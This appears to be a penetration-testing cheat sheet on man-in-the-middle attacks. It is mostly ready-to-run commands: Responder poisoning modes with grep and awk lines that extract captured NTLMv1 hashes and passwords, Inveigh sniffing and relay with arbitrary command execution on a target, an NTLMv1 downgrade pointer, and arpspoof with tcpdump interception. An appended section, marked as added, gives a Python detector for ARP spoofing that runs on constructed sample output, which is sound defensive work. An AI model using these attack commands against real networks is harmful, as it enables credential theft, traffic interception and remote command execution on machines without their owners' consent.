MITM

Responder

Set challenge to 1122334455667788 in /etc/responder/Responder.conf

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3

NTLM

NTLM MITM attacks

https://github.com/Kevin-Robertson/Inveigh (PowerShell) https://github.com/Kevin-Robertson/InveighZero (C#)

Inveigh can be executed without elevated privileges, but certain features such as the LLMNR spoofer will not be able to start. Make sure the ports it uses are allowed by the local firewall.

Sniffer

Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y
Stop-Inveigh

Relay

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session

Packets can be captured in order to extract the hashes.

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack https://crack.sh

misc::easyntlmchall

NTLM Relay

Under construction

SMB signing has to be disabled for this kind of attack.

https://github.com/Kevin-Robertson/Inveigh/blob/master/Scripts/Inveigh-Relay.ps1
https://github.com/lgandx/Responder/blob/master/tools/MultiRelay.py
https://www.rapid7.com/db/modules/exploit/windows/smb/smb_relay
https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py
https://github.com/Arno0x/NtlmRelayToEWS

ARP Spoofing

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -s 65535 -w out.pcap -vv

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -s 65535 -w out.pcap -vv
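Defensive counterpart to the capture above, added here as an example and not part of the original page: a small detector that reads tcpdump ARP text output (the form produced by `tcpdump -nn -e -r out.pcap arp`) and flags an IP address that is advertised by more than one MAC, which is the signature ARP spoofing leaves in a capture. The sample lines are constructed, not from a real capture.

```python
import re
from collections import defaultdict

# Constructed sample lines in the style of `tcpdump -nn -e arp` output (not a real capture):
# legitimate request/reply pairs for the gateway (.1) and a host (.10), then a third MAC
# answering for both addresses, as a poisoning host would.
SAMPLE_LINES = """\
12:00:00.000100 00:0c:29:aa:bb:cc > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.1.1 tell 192.168.1.10, length 28
12:00:00.000200 00:50:56:11:22:33 > 00:0c:29:aa:bb:cc, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:50:56:11:22:33, length 28
12:00:00.000300 00:50:56:11:22:33 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.1.10 tell 192.168.1.1, length 28
12:00:00.000400 00:0c:29:aa:bb:cc > 00:50:56:11:22:33, ethertype ARP (0x0806), length 42: Reply 192.168.1.10 is-at 00:0c:29:aa:bb:cc, length 28
12:00:05.000500 de:ad:be:ef:00:01 > 00:0c:29:aa:bb:cc, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
12:00:05.000600 de:ad:be:ef:00:01 > 00:50:56:11:22:33, ethertype ARP (0x0806), length 42: Reply 192.168.1.10 is-at de:ad:be:ef:00:01, length 28
""".splitlines()

# Only ARP replies carry an IP-to-MAC binding; requests are skipped.
REPLY_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[0-9a-f:]{17}) > (?P<dst>[0-9a-f:]{17}), ethertype ARP .*?"
    r"Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]{17})"
)


def detect_arp_conflicts(lines):
    """Return (timestamp, ip, reason) alerts for IPs advertised by more than one MAC,
    and for replies whose Ethernet source differs from the MAC they advertise."""
    claimed = defaultdict(set)  # ip -> MACs seen advertising it in is-at replies
    alerts = []
    for line in lines:
        m = REPLY_RE.match(line)
        if not m:
            continue
        ts, src, ip, mac = m["ts"], m["src"], m["ip"], m["mac"]
        if src != mac:
            alerts.append((ts, ip, f"frame source {src} differs from advertised {mac}"))
        if claimed[ip] and mac not in claimed[ip]:
            known = ",".join(sorted(claimed[ip]))
            alerts.append((ts, ip, f"now claimed by {mac}, previously {known}"))
        claimed[ip].add(mac)
    return alerts


def main():
    for ts, ip, why in detect_arp_conflicts(SAMPLE_LINES):
        print(f"{ts} ARP conflict for {ip}: {why}")


if __name__ == "__main__":
    main()
```

A first-seen binding is trusted, so run it against a baseline capture from a quiet network and compare, or seed `claimed` from a known gateway MAC.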